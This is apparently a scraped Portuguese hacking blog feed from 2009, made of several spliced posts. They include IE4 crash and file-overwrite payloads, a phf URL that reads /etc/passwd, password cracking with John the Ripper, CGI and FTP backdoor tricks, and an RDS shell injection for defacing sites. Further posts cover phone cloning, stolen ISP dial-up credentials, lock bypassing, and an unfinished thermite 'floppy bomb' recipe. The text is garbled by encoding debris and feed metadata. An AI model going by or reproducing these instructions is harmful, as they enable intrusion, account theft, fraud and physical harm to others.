*/HEAD><br />*BODY>*SCRIPT LANGUAGE="VBSCRIPT"><br /><br />Set fs = CreateObject#"Scripting.FileSystemObject" #<br />Set a = fs.CreateTextFile#"C:\AUTOEXEC.BAT", True #<br />a.WriteLine#"@echo off"#<br />a.WriteLine#"echo This is a test."#<br />a.WriteLine#"pause"#<br />a.WriteLine#"@echo on"#<br />a.Close<br /><br />*/SCRIPT><br /><br />O seu arquivo "AUTOEXEC.BAT" foi sobreescrito!<br /><br />*/BODY><br />*/HTML><br /><br />---------------------------------------------------<br /><br />#BUG 4#<br />Vulnerable : IE 4.0<br />Descricao: Causa overflow no IE, e como decorrente o seu travamento.<br /><br />*HTML><br />SuCkEr!!!<br />*EMBED<br />SRC=file://C|/A.012345678901234567890123456789012345678901234567890123456789012345678901234567890123456789<br /><br />01234567890123456789012345678901234567890123456789012345678901234567890123456789012345678901234567890123456<br /><br />7890123456789012345678901234567890123456789><br /><br /><br />40<br />80<br />160 170 180<br />190 200<br />*/HTML><br />------------------------------------------------<br /><br />#BUG 7#<br /><br />>>>Funciona com: IE 4.0<br />>>>Descricao: dah uma mensagem de Operacaum Ilegal e<br />fecha o browser ou<br />uma<br />tela azul de Erro Fatal e vc terah que rebootar a<br />maquina.<br />Trying to crash IE 4.0<br />CLASSID=11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br /><br />1111111111111111111111111111<br /><br />1111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br /><br />1111111111111111111111<br /><br />11111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111111<br /><br />111>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-34001708245159168502009-10-30T17:52:00.001-07:002009-10-30T17:52:45.504-07:00Hackeando Site<span style="font-weight:bold;">1->INTRODUÇÃO<br />Por favor, saiba que hackear webpages é considerado lammer em muitas opiniões, e muito provavelmente NÃO vai te dar uma boa reputação. As pessoas sempre podem checar log's uma vez notificadas de hacking, e provavelmente o seu IP/Host pode vir à tona e no mínimo irão te processar pela lei de crimes no computador, e vc será condenado à alguns anos de prisão e terá de pagar uma BOA quantia de dinheiro. Então por favor tente não abusar do conhecimento em relação a esse assunto. Esse texto tem apenas a função de informar.<br /><br />2->HACKEANDO FREE WEB PAGES<br />O serviço de Hosting Gratis de WebPages é feito por empresas como a Tripod and Geocities, que dá espaço de graça e ganha dinheiro com propaganda. Há maneiras de hackear essas empresas e ter acesso à todas as senhas/usernames, mas é algo que seria complexo para a maioria das pessoas. Esse método que vai ser explicado é simples engenharia social, o que não é muito dificil de se fazer. Então, não se ache um Hacker de Elite só porque vc zuou a webpage de uma pobre pessoa que apenas esqueceu algumas informações pessoais na própria Page.<br />Tudo que vc tem que fazer é abrir uma conta num serviço de e-mail (ex.:Hotmail) e escolher uma vítima. Vc precisará achar a data de nascimento, o nome, e o e-mail antigo da pessoa, e se possivel, o endereço dela. Resumindo... Consiga o MAXIMO de info que vc puder sobre ela.<br />Todas essas empresas têm um serviço de verificação para pessoas que perderam a password da sua Page. Quando vc tiver o maximo de informações sobre a pessoa, mande um e-mail para a empresa dizendo que vc mudou de e-mail. ESPERE duas semanas e mande outro. Só que nesse, diga que vc perdeu a sua password. Na maioria das vezes eles te mandam um e-mail de volta, dizendo que vc precisa confirmar alguns dados pessoais seus, como a data de nascimento ou endereço.<br />Tudo o que vc tem de fazer é mandar todas as informações que vc conseguiu, e esperar a password chegar fresquinha no seu e-mail.<br />Por outro lado, companhias como a Geocities são muito ocupadas para ficar respondendo e-mailsde perda de password, então eles fizeram uma pagina onde membros podem pegar suas password'z de volta. (http://www.geocities.com/help/pass_form.html).<br /><br />3>HACKEANDO PAGES DE USUÁRIOS<br />Existem várias maneiras de hackear pages de usuários em um servidor. Eu vou tentar listar aqui o máximo de maneiras possíveis para tal, mas não espere muito em termos de informação DETALHADA.<br />Pegando as password's:<br />Beleza, suponha que vc encontrou uma page que vc quer hackear, e que esta page esteja num server em que vc não tenha acesso, e que esse servidor seja BASICO, segurança leve. Tudo bem vai.... segurança BEM LEVE! Não vou mentir... funciona melhor em sites SEM SEGURANÇA. hehehe<br />Nesse caso, pegar a passwd é bem fácil. Abra um telnet para o FTP do server anonimamente e olhe no diretório ETC. Pegue o arquivo chamado "passwd". Outra maneira de pega-las é achar o seu alvo, abrir um WWW-Browser e digitar:<br />cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd DEPOIS do nome do servidor. Ex.:<br />http://www.vitima.com/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd<br />OBS: se vc não souber o que colocar no lugar de "vitima.com", SE MATE LAMMER!<br />Voce pode vir à pegar um arquivo passwd que não tenha contas de usuários, apenas defauts com a senha encriptada com um * no lugar. Em certos servidores com isso, vc pode ter passwd shadowed, mas em que todas as passwd files que já vi, havia um usurname como FTP e/ou NEWS que não tinham as senhas encriptadas, com um * no lugar.<br />Se vc achar apenas isso e NADA de senhas encriptadas, tente outra maneira de hackear o server.<br />Vc precisa examinar o arquivo de password'z e achar algo tipo assim:<br />rrc:uXDg04UkZgWOQ:201:4:Richard Clark:/export/home/rrc:/bin/ksh<br />Não precisa ser EXATAMENTE assim. a unica parte REALMENTE importante é o rrc:uXDg04UkZgWOQ, que é o username(rcc) e o passwd ENCRIPTADO(uXDg04UkZgWOQ)<br />Pegue um programa chamado JOHN THE RIPPER, que pode ser encontrado em qualquer Site de H/P/V/A/C na Web.<br />Para usar o JOHN THE RIPPER é facil. Se vc quer quebrar rapidamente as senhas, vá no prompt do DOS, no diretório do programa e digite:<br />john passwd -single<br />Onde passwd é o nome da passwd file. Por exemplo, se vc salvou a passwd file como pass.txt, ficaria:<br />john pass.txt -single<br />Uma coisa importante é que a passwd file esteja no mesmo diretório que o programa.<br />Para obter uma lista de outros métodos de quebrar uma passwd file, digite apenas "john", no diretório do programa, para obter uma lista de comandos.<br />Eu acho que o JOHN THE RIPPER funciona bem sem wordlists, mas algumas pessoas discordam. Se quiser se aprofundar no programa, procure um texto que enine a usar o JOHN THE RIPPER. Este aqui ensina apenas o básico.<br />Para concluir... se vc pegou a password e username, DIVIRTA-SE!!!<br /><br />4>HACKEANDO UMA PAGE EM UM SERVER QUE VC TB TENHA ACESSO:<br />Essa seção ensina como hackear uma webpage num server onde vc já tem uma conta. Esse texto foi retirado de um texto feito por Lord Somer, e já que não quero arrancar algo importante do texto, vou apenas deixa-lo aí, apenas vou traduzi-lo, pois é um método complexo, onde qualquer cagada pode zoar o esquema todo.<br />Exploiting Net Adminstration CGI (by Lord Somer)<br />#######################################<br />Exploiting Net Administration Cgi's<br />like nethosting.com<br />Written by:Lord Somer<br />Date:9/2/97<br />#######################################<br />Bom, desde que a Nethosting.com fechou ou o que quer que seja, eu pensei:"Que porra eu vou fazer antes de esquecer como eu fiz esses hackz?" O que eu vou fazer é dizer COMO eu fiz, então daí vc pode vir a encontrar o mesmo sistema em algum outro lugar ou usar para tirar suas próprias idéias para o hack.<br />Basicamente, a nethosting.com fez toda a sua administração via CGI'z (net-admin.nethosting.com) Primeiro, vc precisa ter uma conta nesse server, falsifique unz numeros de cartão de crédito se necessário. Depois, entre dentro da área de administração... vc vai ver umas merdas como administração de FTP, e-mail, etc.<br />Quem se importa com e-mails? Então, vamos ao FTP. Clique na FTP ADMINISTRATION. Vamos dizer que vc está logado como 7hsphere.com. Seu url seria algo do tipo:<br />http://net-admin.nethosting.com/cgi-bin/add_ftp.cgi?7thsphere.com+ljad32432jl<br />Apenas mude o 7hsphere.com para qualquer domínio que o sistema tenha, ou se no chmod, apenas delete essa parte, mas deixe o sinal de +, para editar o diretório usr/home. Na administração do FTP. faça uma conta de backdoor para esse domínio criando um diretório chamado /, já que multiplas /// continuam mostrando apenas /.<br />Uma vez que vc tem o backdoor, DIVIRTA-SE!<br />Bom, a teoria básica desse tipo de exploit é que:<br />-O CGI passava um parâmetro onde nós mudamos para algo do nosso interesse, para editarmos infoz.<br />-Desde que isso usa o bagulho depois do + para verificar se este é uma conta valida logada, isso não checa a password novamente.<br />- Multiplas ///'z no UNIX apenas significam uma /, então, não podemos ganhar acesso à diretórios de outras pessoas ou todo o diretório /usr/home.<br />Eu usei este método para hackear alguns lugares conhecidos:<br />-7thsphere.com<br />-sinnerz.com<br />-hawkee.com<br />-warez950.org<br />-lgn.com<br />E muitos outros sites desconhecidos.<br /><br />5>OUTRA MANEIRA DE SE HACKEAR USER PAGES<br />Outro método que pode funcionar com servidores mal administrados é, às vezes, quando vc abre um FTP no server, vc sai do seu diretório home, volta algunz diretórioz, e acha o diretório da vitima. Uma vez que vc tenha feito isso, vc pode acessar os arquivos HTML, salvá-los no disco, editá-los e colocar novamente dentro do dir. Os arquivos HTML podem ou não ficar dentro do FTP, mas com adminz, eles não são acessíveis para outros usuários.<br /><br /><br />6>MÉTODOS QUE NÃO SE ENCAIXAM NAS OUTRAS CATEGORIAS.<br />Há muitas outras maneiras de se Hackear Web Pages. A burrice das pessoas é uma boa maneira. Muitas password'z são adivinháveis se elas não são hackeáveis. Isso não é hacking, mas sim estupidez de outras pessoas. Se vc pegar o root de um server, vc pode ter acesso a TUDO no servidor. Então, se vc quer hackear um servidor de webpage, ou acessar qualquer coisa nesse servidor, vc deve pegar uma conta e rodar um exploit no servidor, mas isso é uma coisa que newbies não devem tentar enquanto não tiverem certeza do que estão fazendo.</span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-66306567197158869512009-10-30T17:51:00.001-07:002009-10-30T17:51:49.053-07:00Invasão pelo FTP1. passo Vá ao DOS e digite FTP , ao aparece o prompt ftp, digite OPEN, ira abrir um outro Prompt (to), digite o nome do host ou seu IP , ex.: (to) ftp.convex.com.br. Ao conectar ele pedira a senha e o Password, nao entre com seu email nem com a sua senha se estiver hackeando o seu provedor!!(NUNCA DIGITE NADA NO USERS E NO PASSWORDS)<br /><br />2. passo No login precione ENTER, no password precione Novamente... Irá aparecer o prompt ftp, novamente..., ai é só digitar : quote user ftp , precione ENTER e digite: quote cwd ~root Precione ENTER novamente e digite: quote pass ftp Pronto, vc esta Hackeando... Mas tem um porem..., se escrever a mensagem : user restriction aplly, vc não esta Hackeando.., pois esta aplicada a proteção..., para isto tente com outro user tipo quote cwd ~sys e os outros da lista UNIX....<br /><br />3. passo Após ENTRAR!!!!!! Ao entrar vc vai estar no Diretorio do login, Ex.: \home\root\ Para ver a lista de users vc volta um dir vá para o dir \home\ e cada dir éum usuario,... tente pegar as senhas ,mais pegando as senhas a um porem ela sao todas cryptografadas, mais nao tem problema nenhum mande elas para min que eu descrypto elas ou pegue vc mesmo um descrypto e blZ !!! Para saber os comandos do prog FTP digite: ?<br /><br /> <br /><br /> Obs: As informações contidas nessa page, são unicamente para fins educativos.<br /><br />Eu não me responsabilizo pelo mau uso das informações ou por qualquer cagada que vc venha a fazer!!!!┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-37546436165949012702009-10-30T17:50:00.000-07:002009-10-30T17:51:14.280-07:00Invadindo por RD'SObs.: Só funciona se o provedor usar Windows NT.<br />Essa porra é usado pra hackear paginas , pra isso vc precisa saber a pasta que se encontra o index ou default, bom na maioria dos casos é só digitar wwww.servidor.com/idq.idq, ai aparece a bosta do diretorio!, geralmente é c:InetPubwwwroot , bom ai tem que descobrir se o servidor usa index.asp,index.html,index.htm e mesma coisa com default.<br />Bom exemplo, como faço? assim, www.servidor.com/idq.idq ou ida.ida ou idc.idc, bom ai vou ver o diretorio.. anoto num txt, agora só decobrir se é index ou default e qual a extensão, bom só testando.. www.servidor.com/index.extenções possiveis ; ou www.servidor.com/default.exetenções possiveis , bom qual entrar é o certo ai é só anotar, vamos supor que o diretorio é :<br />c:inetpubwwwrootindex.htm, ai depois de ter achado isso entra na tela do RDS, ou seja www.servidor.com/msadc/samples/adctest.asp, e vai aparecer a tela do RDS, agora apague tudo que tiver escrito no query e digite:<br />Select * from Products where ProductType='|shell("cmd /c echo (O QUE QUER QUE APAREÇA NO SEU HACKED) > c:InetPubwwwrootindex.htm")|'<br />Depois é só apertar RUN e pronto!, agora vamos se por que vc quer evitar tudo isso, é so pegar um exploit chamado msadc.pl e pronto.. vc usa assim:<br />perl msadc.pl -h www.servidor.com , se aparecer cmd , vc digita :<br />(O que quer escrever) < C:InetPubwwwrootindex.htm (enter) só isso amigos.. bom aproveito, para ver se o servidor tem o bug do RDS é testando com o msadc/samples/adctest.asp ou passando um scaneador de vulneralidades! (gosto do nessus pra linux),pega ele em www.nessus.org.┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-69151095618663695572009-10-30T17:49:00.001-07:002009-10-30T17:49:49.104-07:00Clonando Celular NókiaANTES DE MAIS NADA QUERO DIZER A PALAVRA "CLONAGEM" ESTA EXPRESSA DE UM<br /><br />MODO COMPARATIVO COM RELAÇÃO A CLONAGEM VERDADEIRA. OU SEJA, O QUE VAMOS<br /><br />FAZER É SIMPLESMENTE REPROGRAMAR NOSSO CELULAR PARA QUE ATUE COMO OUTRO.<br /><br /><br /><br /><br /><br />CLONAGEM:<br /><br />--------<br /><br /><br /><br />ANTES DE CLONAR NOSSO TELEFONE TEMOS QUE TER 3 COISAS FUNDAMENTAIS PARA<br /><br />O BOM FUNCIONAMENTO:<br /><br /><br /><br />CÓDIGO DE ÁREA<br /><br />ID<br /><br />MIN (NÚMERO INTERNO DO APARELHO MÓVEL)<br /><br /><br /><br /><br /><br />CÓDIGO DE ÁREA:<br /><br />--------------<br /><br />ESTE CÓDIGO É DESIGNADO PARA CADA CIADADE DE CADA PAÍS.<br /><br /><br /><br /><br /><br />SYSTEM ID:<br /><br />--------<br /><br />IDENTIFICAÇÃO DO SISTEMA, ESTE É UM NÚMERO DE 5 DIGITOS, OU SEJA:<br /><br /><br /><br />POR EXEMPLO: 52693<br /><br /><br /><br /><br /><br />MIN<br /><br />---<br /><br />ESTE NÚMERO É SIMPLESMENTE O NÚMERO DO CELULAR.<br /><br /><br /><br /><br /><br /><br /><br />CLONANDO CELULARES NOKIA<br /><br />-----------------------<br /><br />MODELOS - 21XX, 51XX, 61XX, 636, 639, 918.<br /><br /><br /><br />1) PRESSIONE *#639#<br /><br />2) PRESSIONE O NÚMERO DO CELULAR DE 10 DÍGITOS, PRESSIONE OK<br /><br />3) TECLE O sys id, PRESSIONE OK<br /><br />4) O TELEFONE SERÁ RELIGADO<br /><br /><br /><br />MODELOS - P1000, 100, PT101, PT128, PT228, PT232.<br /><br /><br /><br />1) LIGUE O TELEFONE<br /><br />2) PRESSIONE *3001#12345<br /><br />3) A TELA MARCA 00<br /><br />4) MANTENHA PRESSIONADO CLR UNS SEGUNDOS<br /><br />5) TELCE O NÚMERO DE CELULAR DE 10 DÍGITOS<br /><br />6) PRESSIONE store, 02, CLR (POR ALGUNS SEGUNDOS)<br /><br />7) PONHA O sys id<br /><br />8) PRESSIONE *1*10333*05*05, PRESSIONE store<br /><br />9) PRESSIONE 03, PRESSIONE store<br /><br />10) PRESSIONE CLR<br /><br />11) DESLIGUE O TELEFONE PARA TERMINAR A PROGRAMAÇÃO.<br /><br /><br /><br /><br /><br />MODELOS - 232, 239, 515.<br /><br /><br /><br />1) PONHA *3001#12345, PRESSIONE STO 00<br /><br />2) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 beeps)<br /><br />3) PONHA 911#5551212#0 * 12345, STO, 01, STO<br /><br />4) PRESSIONE E MANTENHA PRESSIONADO CLR (VAI OUVIR 2 bepps)<br /><br />5) PONHA O CÓDIGO DA ÁREA E O NÚMERO DO TELEFONE, PRESSIONE STP, 01, STO<br /><br />6) PRESSIONE E MANTENHA PRESSIONADO CLR (2 beeps)<br /><br />7) PRESSIONE *1*1 *333*15*05# 0111 * 1 ,STO, 01, STO<br /><br />8) PRESSIONE E MATENHA PRESSIONADO CLR (2 beeps)<br /><br />9) DESLIGUE E LIGUE O APARELHO.┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-37796185717225936002009-10-30T17:47:00.000-07:002009-10-30T17:48:46.344-07:00Dicionário Hacker<span style="font-weight:bold;">Abaixo segue uma lista de termos usados pelos hackers, lammers, usuários, povão, resto, todo mundo que navega na net: Letra A acceptable use policy - Regras de boa conduta para a utilização correta da rede e seus serviços. Pode ser um documento distribuído ao novo utilizador de um determinado sistema. anonymous - Anônimo. Normalmente utilizado para o login num servidor FTP, para indicar que se trata de um utilizador não registado na maquina em questão. A password a fornecer deve ser o endereço eletrônico. ANSI - Conjunto de normas para a transmissão de caracteres de controle para um terminal, permitindo: tratamento de cores e outros atributos, movimento do cursor, som, etc. terminais. archie - Ferramenta que permite a procura de arquivos e informações em servidores FTP. Indica-se ao archie o nome do arquivo (ou parte dele) que deseja encontrar e ele fornece o nome (endereço) dos servidores onde pode encontrar. arpanet - Rede de computadores criada em 69 pelo Departamento de Defesa norte-americano, interligando na altura instituições militares. Em meados dos anos 70 varias grandes universidades americanas aderiram à rede, que deu lugar à atual Internet. article - Artigo. Um texto existente na Usenet/News. artigo - Um texto existente na Usenet/News. ASCII - Norma para a codificação de caracteres através de números binários, utilizada em diferentes computadores. Define a codificação dos caracteres com códigos de 0 a 127. auto-estrada da informação - Um ligação ou conjunto de ligações entre computadores, formando uma rede de redes, de preferencia com meios de comunicação extremamente rápidos. Um nome abusivamente usado por vezes (sobretudo nos meios tradicionais) para designar a(s) rede(s) atualmente existente(s) (e em particular a Internet), pois uma grande parte delas ainda tem muitas interligações bastante lentas, longe do futuro próximo em que tudo se contara' em dezenas de Mbps e Gbps... :-) AUP - ver acceptable use policy. auto-estrada eletrônica - Ver auto-estrada da informação. Letra B Baud - Quantidade de informacoes que sao transferidas entre dois computadores interligados. Bios - É a memoria basica da maquina. Contem instrucoes primarias para o funcionamento correto da maquina. É na BIOS que fica armazenada a informacao de que em seu PC existe um teclado, por exemplo. Bug - Erro em algum programa ou arquivo. backbone - Estrutura de nível mais alto em uma rede composta por várias sub-redes. bandwidth - Largura de Banda. Termo que designa a quantidade de informação passível de ser transmitida por unidade de tempo, num determinado meio de comunicação (fio, onda radio, fibra óptica, etc.). Normalmente medida em bits por segundo, kilobits por segundo, megabits por segundo, kilobytes por segundo, megabytes por segundo, etc. BBS - Bulletin Board System. Computador (1 ou vários) que permitem que os usuários se liguem a ele através de uma linha telefônica e onde normalmente se trocam mensagens com outros usuários, se procuram arquivos e programas ou se participa em conferencias (fóruns de discussão) divulgadas por varias BBS. Digamos que uma BBS esta' para a Internet assim como uma aldeia está para o Mundo. bitnet - Rede mundial acessível pela Internet, mas distinta desta, com características educacionais. browser - Um programa que permite visualizar e utilizar uma dada base de dados, distribuída ou não por vários computadores. Termo normalmente aplicado para os programas que permitem navegar no World-Wide-Web. BTW - Sigla do inglês "By the Way" (Já' agora / Por falar nisso, etc.). Usada em textos de correio eletrônico, artigos de news, etc. Letra C Cavalo de Tróia - É uma especie de virus (voce programa para fazer o que quiser). Muito mais potente que um virus comum que tem como unica funcao destruir computadores. cello - Um programa (browser) para navegar no WWW. Criptografia - Torna algum programa ou mensagem secreta, ou seja, so' podera' ler aquela mensgaem ou executar aquele programa a pessoa que tiver a chave criptografica (que serve como uma senha) para desencriptar-los. CERN - Centre Europeen de Recherche Nucleaire. Centro Europeu de Investigação Nuclear. Um dos centros mais importantes da Internet (e, claro, da investigação física). Nele trabalham centenas (ou mesmo milhares?) de investigadores e a sua "jóia da coroa" é um grande circulo de aceleração de partículas com 27 Km de diâmetro, que fica por baixo de Genebra, na Suíça, atualmente o maior acelerador de partículas existente no Mundo. CERT - Computer Emergency Response Team. Organismo criado em 1988 pela Darpa, visando tratar questões de segurança em redes, em particular na Internet. chain letter - Uma carta que é recebida por alguém e enviada para varias pessoas e assim sucessivamente até que se torna excessivamente difundida. Normalmente o seu texto incita à difusão da carta por outras pessoas. chain mail - Ver "chain letter". ciberespaco - Por ciberespaco designa-se habitualmente o conjunto das redes de computadores interligadas e de toda a atividade ai existente. É uma espécie de planeta virtual, onde as pessoas (a sociedade da informação) se relacionam virtualmente, por meios eletrônicos. Termo inventado por William Gibson no seu romance Neuromancer. client - Cliente. No contexto Cliente/Servidor, um Cliente é um programa que pede um determinado serviço (por exemplo, a transferencia de um arquivo) a um Servidor, outro programa. O Cliente e o Servidor podem estar em duas maquinas diferentes, sendo esta a realidade para a maior parte das aplicações que usam este tipo de interação. cliente - Ver client. conexão - Ligação do seu computador a um computador remoto. correio caracol - Tradução do inglês "snail mail". Ver snail mail. correio eletrônico - Correio transmitido por meios eletrônicos, normalmente, redes informáticas. Uma carta eletrônica contem texto (como qualquer outra carta) e pode ter, eventualmente, anexo um ou mais arquivos. crosspost - Fazer o crosspost de... Ato de enviar para um grupo de news um artigo (ou parte) já' publicado (ou a publicar na mesma altura) noutro grupo. cracker - Indivíduo que faz todo o possível e o impossível para entrar num sistema informático alheio, quebrando sistemas de segurança, para assim poder causar danos. cyberspace - Ver ciberespaco. Letra D daemon - Programa que corre (que foi lançado) num computador e esta' (sempre) pronto a receber instruções/pedidos de outros programas para a execução de determinada ação. Defaults - Diz-se que é a configuracao normalmente utilizada por um equipamento ou programa. domain - Domínio. Nome à direita do símbolo @ num endereço eletrônico. Por exemplo: o dominio do meu provedor e' hotmail.com débito - Quantidade de informação por unidade de tempo. dial-IN - Designação de um tipo de ligação ou de um ato de ligação à Internet, neste caso pelo estabelecimento de uma chamada (telefônica - Dial) para um computador, através de, por exemplo, um modem. dial-UP - Ver Dial-IN. DNS - Sigla de Domain Name Server. Designa o conjunto de regras e/ou programas que constituem um Servidor de Nomes da Internet. Um servidor de nomes faz a tradução de um nome alfanumérico (p. ex. microbyte.com) para um numero IP (p. ex. 192.190.100.57). Por exemplo, no DNS brasileiro, gerem-se todos os nomes terminados em br. Qualquer outro nome será' também traduzido pelo mesmo DNS, mas a partir de informação proveniente de outro DNS (isto se essa informação não tiver sido previamente obtida). domínio - Ver domain. domínio publico - Algo que esta' no domínio publico (software, p. ex.) é algo que se pode copiar, cortar, colar, queimar, distribuir, deleitar e normalmente utilizar sem pagar o que quer que seja! :-) Normalmente deve ser dado o devido credito ao(s) autor(es) desse algo. DOOM - Um dos mais famosos jogos distribuídos em shareware na Internet. Os seus criadores (3 jovens) ficaram rapidamente milionários! :-) Tem vários níveis, efeitos sonoros, é a 3 dimensões e permite que vários jogadores joguem simultaneamente, cada um no seu computador. Um verdadeiro clássico no gênero (tiros e explosões). download - Fazer o download de um arquivo. Ato de transferir o arquivo de um computador remoto para o seu próprio computador, usando qualquer protocolo de comunicações. Letra E Endereço IP - É o endereco que uma maquina possui ao se conectar na Internet. A cada vez que voce se conecta, voce obetem um novo endereco IP. edu - Sufixo presente em variados endereços na Internet e que designa instituições de ensino/educação (edu=educational). elm - Um programa/leitor de correio eletrônico para ambientes Unix (se bem que também se possam encontrar versões para outros sistemas operativos). À base de menus com escolha de opções por letras e teclas de cursor. email - Eletronic Mail. Correio Eletrônico. email address - Endereço (de correio) eletrônico. Ver Endereço eletrônico. emoticon - ver smiley. endereço eletrônico - É um cadeia de caracteres, do tipo "nome_usuario@qqcoisa.empresax.br" (sem aspas) que identifica univocamente um determinado utilizador dentro da Internet e, em particular, a sua caixa de correio eletrônica. Qualquer envio de correio eletrônico para esse utilizador deve ser feito para o seu endereço eletrônico. ethernet - Uma das arquiteturas possíveis em redes locais. As redes Ethernet usam normalmente cabos coaxiais que interligam vários computadores. Cada um deles acede à rede em concorrência com os outros, existindo depois regras/convenções que permitem designar qual o computador que deve transmitir informação num determinado instante. A informação pode ser transmitida em modo "Broadcast", ou seja, para todos os outros computadores da rede e não apenas para um só'. eudora - Um programa/leitor de correio eletrônico muito completo, existente em varias plataformas, entre elas, os Macintosh e PC (Windows). Recomendado. Letra F firewall - Parede de Fogo. Medida de segurança que pode ser implementada para limitar o acesso de terceiros a um determinada rede ligada à Internet. Os mecanismos de implementação são variados</span>┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-49361913327052870912009-10-30T17:43:00.000-07:002009-10-30T17:44:16.301-07:00Senha Pirata1 - Tente não conectar-se entre 9:00 e 22:00. <br />,MXCM <br /><br /> <br />2 - Nunca, mas nunca, use mais de 2 horas por dia, mesmo assim é muito, o melhor é tentar descobrir se a senha que você esta usando é "full", se for, se deu de bem, geralmente o "usuario" nem liga para seu saldo de horas gastas, mas não exagere. <br /><br />3 - Tenha mais de uma senha de acesso, no mínimo 3, para caso de algo errado com uma das senhas você tem mais 2 para poder ir correndo atrás de mais senhas e ficar mais calmo. <br /><br />4 - Se você perceber que esta "caindo" muito, não entre mais nesse dia que você caiu, entre só no outro dia, se o "usuário normal" estiver conectado também, geralmente, um dos dois que usam a mesma senha vão cair, toda hora um caí e se ele cair de mais ele pode desconfiar e acabar trocando a senha e babal pra você. <br /><br />5 - Seja discreto, não vai chegar numa sala de Chat se achando o maior e ficar falando para todo mundo que esta usando um senha pirata. <br /><br />6 - Use a cabeça. <br /><br />Agora vamos as mais esperadas, você tava loco pra chegar aqui, num tava? É isso, "EU QUERO É VER O LOKO" <br /><br />Servidor Fone Usuário Senha Estado <br />Uninet (061) 327 2882 ieak unisys96 DF <br />Mandic (011) 870 0100 ppp novo São Paulo <br />IBM (011) 887 9001 <nada> <nada> São Paulo <br />UOL 0800 15 8002 universo online (Brasil) <br /><br />Essas são senhas de inscrição, se você ainda não sabe nem pegar senhas de inscrição, vai aprender agora, é só pensar um pouco, vamos lá: <br />Você já deve ter comprado uma dessas revista de Informática, algumas delas geralmente vem com um Cd de horas grátis de internet, aí você já deve ter executado o programa, ele pede para instalar a merda do Internet Explorer e mais monte de coisa, aí no final, geralmente, reinicia o computador aí é executado altomaticamente o Internet Explorer, ELE VAI DISCAR PARA UM LOCAL PARA PODER FAZER SUA INSCRIÇÃO... e esse local é um servidor de internet... já sabe até o que fazer né não? <br /><br />Para você conseguir achar os dados da inscrição, você tem que saber em qual arquivo tá guardado os dados sobre a mesma, use um editor Hexadecimal, ou use o Edit do MS-DOS. Visualize arquivo por arquivos do diretório onde fica a Instalação das horas grátis, procure por numeros de telefone, quando você achar você vai acabar vendo alguma coisa por perto haver com "senha", bom aí tá sua senha de inscrição, e o usuário também deve tá por perto, mas para melhorar sua vida, geralmente, esses dados (telefone, usuário e senha) ficam num arquivo chamado "signup.???", é signup <ponto> alguma coisa, eu esqueci a extensão, mas não há muito arquivo com esse nome. Visualize ele, até pelo Notepad mesmo, gostou? muito bom né nao? Dentro dele vem tudo dividido certinho, tudo prontinho pra usar... bom, você intendeu né? se não intendeu leia denovo! <br /><br />Quase sempre essas senhas só deixam ficar conectadas por um certo tempo, depois o servidor desconectão você, o tempo de conexão é mais ou menos uns 15 minutos, é o tempo que você usa pra fazer a inscrição, mas se você for inteligente e criativo, com esses 15 minutos você pode tentar invadir um servidor da sua cidade e pegar as senhas dele, mas cuidado em, não exagere...┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-83097492395064100582009-10-30T17:37:00.000-07:002009-10-30T17:38:25.733-07:00Isso é muito simples e bastante eficaz:<br /><br /><br />1- Tem que ser uma tranca desse modelo<br /><br />_______<br />| _ | <br />|_| | | <br /> ___|_| <br />| | <br />| 1 2 | <br />| 3 4 | <br />| 5 6 | <br />| 7 8 | <br />| 9 0 | <br />|_____| <br /> | | <br /> ",,,,, <br /><br />2- Pegue na parte onde tem os números e na que a outra parte que coloca a corrente e force para os lados como se quisesse abrir, quando estiver forcando, aperte todos os números com força, ate que todos se abaixem o máximo que possa conseguir... depois olhe os que estiverem mais altos, pois eles que são a senha... Muito Fácil !!!! Não?<br /><br /><br /><br />Descobrir Senhas de Corrente de Bicicleta<br /><br /> : Se você quer abrir uma corrente de bicicleta cuja tranca é por senha numérica, aqui você saberá como. Não difícil, qualquer um pode fazer isto. Vamos a prática!Digamos que a combinação tem 4 números. Então você puxa para ambos os lados a corrente, e veja se as 4 catracas se movem. Mova a última catraca para todas as posições possíveis ate que ela não se mexa. Digamos, neste caso, que parou no 5, então você já sabe que o primeiro numero e 5 e que a combinação e 5?. Então, repita o procedimento com todas as catracas, do mesmo modo, até que apenas as últimas se mexam. Digamos que parou no 4 agora, logo a combinação e 54?. E você vai fazendo a mesma coisa até encontrar todos os números. O terceiro e 1 e o quarto 3, logo a combinação e 5413, basta puxar a corrente que esta aberta.<br /><br /> <br />Importante<br /><br />Lembrando que esses textos, possuem o único objetivo de mostrar a você como funciona as coisas (O "Hacker LoL (eu) " não está falando pra fazer isso pois é crime). Ou seja qualquer problema que você obter utilizando estes textos é de inteira responsabilidade SUA!!┼●|-|ä¢kë® £ö£●┼http://www.blogger.com/profile/01320591599420374168noreply@blogger.com0tag:blogger.com,1999:blog-8821996467599115373.post-53952487735359363362009-10-30T17:35:00.000-07:002009-10-30T17:37:03.679-07:00Disquete Bomba<span style="font-weight:bold;"><span style="font-style:italic;">Você precisa de:<br />1 ou mais discos de 1.44m ;<br />Uma caixa de fósforo, azul ou branco SOMENTE ;<br />Um estilete bem afinado ;<br />Um frasco de cimento plástico ou argamassa ;<br />Um centímetro de magnésio em tiras ( opcional )<br />Uma grama de termite.<br />Mistura de alumínio pulverizado e óxido de ferro, usada na produção do aço ( 